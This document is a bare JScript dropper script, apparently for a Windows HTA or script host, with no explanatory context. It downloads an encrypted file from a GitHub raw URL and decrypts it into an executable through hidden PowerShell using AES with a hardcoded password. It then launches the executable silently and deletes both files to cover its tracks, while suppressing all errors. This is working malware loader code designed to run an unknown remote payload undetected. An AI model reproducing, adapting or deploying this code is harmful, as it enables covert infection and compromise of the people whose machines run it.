<script language="JScript">
  try {
    var shell = new ActiveXObject("WScript.Shell"),
        xhr   = new ActiveXObject("MSXML2.ServerXMLHTTP.6.0"),
        ado   = new ActiveXObject("ADODB.Stream"),
        fso   = new ActiveXObject("Scripting.FileSystemObject");

    xhr.open("GET", "https://github.com/maxnajer/test_2/raw/refs/heads/main/control.enc", false);
    xhr.send();
    var encrypted = xhr.responseBody;

    var encPath = shell.ExpandEnvironmentStrings("%APPDATA%") + "\\" +
                  Math.floor(Math.random()*9000+1000) + ".enc";
    ado.Type = 1; ado.Open(); ado.Write(encrypted);
    ado.SaveToFile(encPath, 2); ado.Close();

    var exePath = encPath.replace(/\.enc$/i, ".exe");
    var pw      = "Test123!";
    var psCmd = [
      "$data = [IO.File]::ReadAllBytes('" + encPath + "');",
      "$salt = $data[0..7]; $ct = $data[8..($data.Length-1)];",
      "$derive = New-Object Security.Cryptography.Rfc2898DeriveBytes('" + pw + "',$salt,100000);",
      "$aes = [Security.Cryptography.Aes]::Create();",
      "$aes.Key = $derive.GetBytes(32); $aes.IV = $derive.GetBytes(16);",
      "$ms = New-Object IO.MemoryStream;",
      "$cs = New-Object Security.Cryptography.CryptoStream($ms,$aes.CreateDecryptor(),[IO.CryptoStreamMode]::Write);",
      "$cs.Write($ct,0,$ct.Length); $cs.Close();",
      "[IO.File]::WriteAllBytes('" + exePath + "',$ms.ToArray());"
    ].join(" ");
    shell.Run("powershell -NoProfile -WindowStyle Hidden -Command \"" + psCmd + "\"", 0, true);

    shell.Run("\"" + exePath + "\"", 0, false);
    fso.DeleteFile(encPath);
    shell.Run("cmd /c ping -n 10 127.0.0.1>nul & del /q \"" + exePath + "\"", 0, false);

  } catch (e) {

  }
</script>
